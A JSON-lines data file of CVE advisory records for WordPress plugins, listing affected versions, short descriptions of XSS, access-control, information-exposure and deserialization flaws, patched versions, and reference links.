{"CVE_ID":"CVE-2025-2108","slug":"xpro-elementor-addons","versionImpact":"1.4.7.1","versionEndExcluding":"1.4.8","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Site Title\u2019 widget's 'title_tag' and 'html_tag' parameters in all versions up to, and including, 1.4.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/layout\\\/frontend.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/layout\\\/frontend.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255986\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255986\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/009b9b0d-6cbd-402e-bc81-24661ff16b9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/009b9b0d-6cbd-402e-bc81-24661ff16b9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4747","slug":"post-category-image-with-grid-and-slider","versionEndExcluding":"1.4.8","description":"The Post Category Image With Grid and Slider WordPress plugin before 1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/004f1872-1576-447f-8837-f29fa319cbdc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/004f1872-1576-447f-8837-f29fa319cbdc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6120","slug":"sparkle-demo-importer","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The Sparkle Demo Importer plugin for WordPress is vulnerable to unauthorized database reset and demo data import due to a missing capability check on the multiple functions in all versions up to and including 1.4.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all posts, pages, and uploaded files, as well as download and install a limited set of demo plugins.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f411d17-5b0d-4a4a-afa8-7efebf6965f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f411d17-5b0d-4a4a-afa8-7efebf6965f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L446\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L469\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L469\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L497\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L497\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L519\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L519\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L595\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L595\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L627\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L627\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L541\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10802","slug":"hash-elements","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The Hash Elements plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the hash_elements_get_posts_title_by_id() function in all versions up to, and including, 1.4.7. This makes it possible for unauthenticated attackers to retrieve draft post titles that should not be accessible to unauthenticated users.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/010590bc-98fb-4afe-9c5e-80ad4c50a34e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/010590bc-98fb-4afe-9c5e-80ad4c50a34e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186151%40hash-elements&new=3186151%40hash-elements&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186151%40hash-elements&new=3186151%40hash-elements&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6279","slug":"woostify-sites-library","versionEndExcluding":"1.4.8","description":"The Woostify Sites Library WordPress plugin before 1.4.8 does not have authorisation in an AJAX action, allowing any authenticated users, such as subscriber to update arbitrary blog options and set them to 'activated' which could lead to DoS when using a specific option name","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/626bbc7d-0d0f-4418-ac61-666278a1cbdb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/626bbc7d-0d0f-4418-ac61-666278a1cbdb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13216","slug":"ht-event","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The HT Event \u2013 WordPress Event Manager Plugin for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.7 via the 'render' function in \/includes\/widgets\/htevent_sponsor.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-event\\\/trunk\\\/includes\\\/widgets\\\/htevent_sponsor.php#L443\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-event\\\/trunk\\\/includes\\\/widgets\\\/htevent_sponsor.php#L443\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/155f494b-be25-4269-9d3b-379309619bbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/155f494b-be25-4269-9d3b-379309619bbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12395","slug":"woo-additional-fees-on-checkout-wordpress","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The WooCommerce Additional Fees On Checkout (Free) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018number\u2019 parameter in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208205\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208205\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b09dc4dc-d2b9-452a-b005-b69feffdbecf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b09dc4dc-d2b9-452a-b005-b69feffdbecf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10329","slug":"ultimate-bootstrap-elements-for-elementor","versionImpact":"1.4.6","versionEndExcluding":"1.4.7","description":"The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6 via the 'ube_get_page_templates' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the contents of templates that are private.","recommendation":"Update to version 1.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3af83ec2-9ebb-4cca-8523-8fe9b1517825?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3af83ec2-9ebb-4cca-8523-8fe9b1517825?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/trunk\\\/inc\\\/functions\\\/core.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/trunk\\\/inc\\\/functions\\\/core.php#L239\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176562\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176562\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13116","slug":"crelly-slider","versionImpact":"1.4.5","versionEndExcluding":"1.4.7","description":"The Crelly Slider WordPress plugin before 1.4.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1755c8ad-7620-4b12-bba0-013e80c2691b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1755c8ad-7620-4b12-bba0-013e80c2691b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3437","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.66","versionEndExcluding":"1.4.67","description":"The Motors \u2013 Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in the ajax_actions.php file in all versions up to, and including, 1.4.66. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute several initial set-up actions.","recommendation":"Update to version 1.4.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0af6050-8602-4ed3-b017-c10aa023849b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0af6050-8602-4ed3-b017-c10aa023849b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2807","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.64","versionEndExcluding":"1.4.65","description":"The Motors \u2013 Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary plugin installations due to a missing capability check in the mvl_setup_wizard_install_plugin() function in all versions up to, and including, 1.4.64. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.4.65, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/admin\\\/setup-wizard\\\/includes\\\/ajax_actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/admin\\\/setup-wizard\\\/includes\\\/ajax_actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/733f7666-468a-455c-a953-3d8946940f13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/733f7666-468a-455c-a953-3d8946940f13?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2808","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.63","versionEndExcluding":"1.4.64","description":"The Motors \u2013 Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Phone Number parameter in all versions up to, and including, 1.4.63 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.64, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90e420be-fe6e-4a35-9c06-f0d360c9f9bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90e420be-fe6e-4a35-9c06-f0d360c9f9bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13649","slug":"xpro-elementor-addons","versionImpact":"1.4.6.7","versionEndExcluding":"1.4.6.8","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 1.4.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235058%40xpro-elementor-addons&new=3235058%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235058%40xpro-elementor-addons&new=3235058%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248584%40xpro-elementor-addons&new=3248584%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248584%40xpro-elementor-addons&new=3248584%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43192613-ce5b-4acc-b284-f40cad7cb8df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43192613-ce5b-4acc-b284-f40cad7cb8df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12584","slug":"xpro-elementor-addons","versionImpact":"1.4.6.2","versionEndExcluding":"1.4.6.3","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6.2 via the 'duplicate' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.","recommendation":"Update to version 1.4.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212531\\\/xpro-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212531\\\/xpro-elementor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa085bc0-af0b-4797-a10f-4d41b4988c02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa085bc0-af0b-4797-a10f-4d41b4988c02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10319","slug":"xpro-elementor-addons","versionImpact":"1.4.6","versionEndExcluding":"1.4.6.1","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6 via the render function in widgets\/content-toggle\/layout\/frontend.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382a46c2-9fec-4642-93b0-c06b9ed1c086?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382a46c2-9fec-4642-93b0-c06b9ed1c086?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179221\\\/xpro-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179221\\\/xpro-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10932","slug":"backup-backup","versionImpact":"1.4.6","versionEndExcluding":"1.4.6.1","description":"The Backup Migration plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.6 via deserialization of untrusted input in the 'recursive_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must create a staging site in order to trigger the exploit.","recommendation":"Update to version 1.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/\\\/backup-backup\\\/tags\\\/1.4.6\\\/includes\\\/database\\\/search-replace.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/\\\/backup-backup\\\/tags\\\/1.4.6\\\/includes\\\/database\\\/search-replace.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.4.6.1\\\/includes\\\/database\\\/search-replace.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.4.6.1\\\/includes\\\/database\\\/search-replace.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5a0c514-5200-47f4-9d2e-684d68946b9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5a0c514-5200-47f4-9d2e-684d68946b9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
